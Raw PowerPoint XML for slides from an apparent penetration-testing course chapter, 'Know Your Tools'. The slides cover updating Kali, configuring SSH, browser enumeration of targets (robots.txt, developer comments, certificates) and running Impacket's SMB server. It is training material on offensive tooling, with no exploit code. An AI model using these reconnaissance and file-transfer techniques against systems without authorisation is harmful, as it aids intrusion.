                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA3125FD-918B-4838-A52B-20FBE85784E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Chapter 8:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Know Your Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40401682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6D639-6685-40A4-BD8E-35D19D477702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>228</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{969110AB-651F-4F9B-95D0-E20325580C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Updating Kali</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40964316-E7F6-4BFA-850F-F0B5379229A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E5EEEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E5EEEF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> apt full-upgrade –y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep snapshots before upgrades</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40763449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C2D7-2868-43F5-8FA3-14F9C4D1D1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>229</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957FDD44-C950-4BF7-B38E-9DA0831D27D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1051993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26F615-FFF2-4132-B136-9A9F0054B1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883C734-D9E6-4319-8DD6-3D1DFF1380B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59ED2985-9C45-4BFF-AD7D-EF437A452B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="5670316" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some interesting things to look for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>robots.txt – May list sensitive pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source code / Comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May indicate functionality that does/used to exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May contain ‘helpful’ comments from developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E83A3F-1CA8-4002-9C8B-96FBB5C964B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6107346" y="1295400"/>
            <a:ext cx="5772956" cy="1190791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCA21AD2-4B47-4AB4-8C82-A36111715682}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="5105"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6107346" y="2815041"/>
            <a:ext cx="5696102" cy="1190790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8496EDB9-952C-442D-AC07-3C77AF9B6E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="9789" b="8775"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7283848" y="4256099"/>
            <a:ext cx="3419952" cy="1980071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5700478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2943B-A8F0-4A31-8F82-2813E57479B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>230</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7AA4AE-D5F3-4234-9EF8-74A82A80CA51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH Configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B1EE52-A3CB-4266-95DA-89DBEEFAB91C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="5364480" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nano /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd_config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optional: Change default port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change default Kali password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optional: add key-based authentication and disable passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generating keys -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-keygen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enabled the SSH server for inbound connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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9CADE286-DFB2-482C-93EB-7CE4C6A766E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5997203" y="786702"/>
            <a:ext cx="5830114" cy="1800476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A8441A-185A-4D70-91C4-DD63D36A528D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5971346" y="2847316"/>
            <a:ext cx="5830059" cy="756572"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7790FFE5-66F8-467C-9EA6-9302EB23DDCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5971346" y="3933971"/>
            <a:ext cx="5839640" cy="724001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCEA9D03-13AC-4C0E-AF59-EA4D66A9882C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5997258" y="5134425"/>
            <a:ext cx="5839695" cy="697821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD24EBB-7072-4A95-9BA5-92426C772C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6042713" y="1931110"/>
            <a:ext cx="1649757" cy="1790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0E1C95-2FA6-43DE-B3B6-A8820A3448D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6012054" y="3116897"/>
            <a:ext cx="2736806" cy="217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6CF6E8F-80E2-435C-8093-ECCE7F02F133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3011765"/>
            <a:ext cx="484946" cy="213837"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="47625">
            <a:solidFill>
              <a:srgbClr val="D1202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D63B1C-1E8B-4880-BCE9-F28DBD275C34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4572000" y="2020632"/>
            <a:ext cx="1470713" cy="417768"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="47625">
            <a:solidFill>
              <a:srgbClr val="D1202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540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775B68-C9E1-45F5-9992-59D48B4E9175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>231</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE9678E5-23C2-4048-959E-8C86456DDB24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SMBServer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C771C1FC-207B-4BE3-869D-F54F5BB3A8C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/usr/share/doc/python3-impacket/examples/smbserver.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Set up the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smbserver.py share . -smb2support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Optional arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-username [user]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-password [pass]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A30BF5-B32B-467B-A273-74DA2CDA8F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5437563" y="3352773"/>
            <a:ext cx="5942549" cy="1878392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0254CBB7-9FAA-46A7-91E0-9B90030E53BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5746652" y="3530991"/>
            <a:ext cx="2848708" cy="1969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0934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77DB44-5846-44B5-9FD8-29533D5098F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>232</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
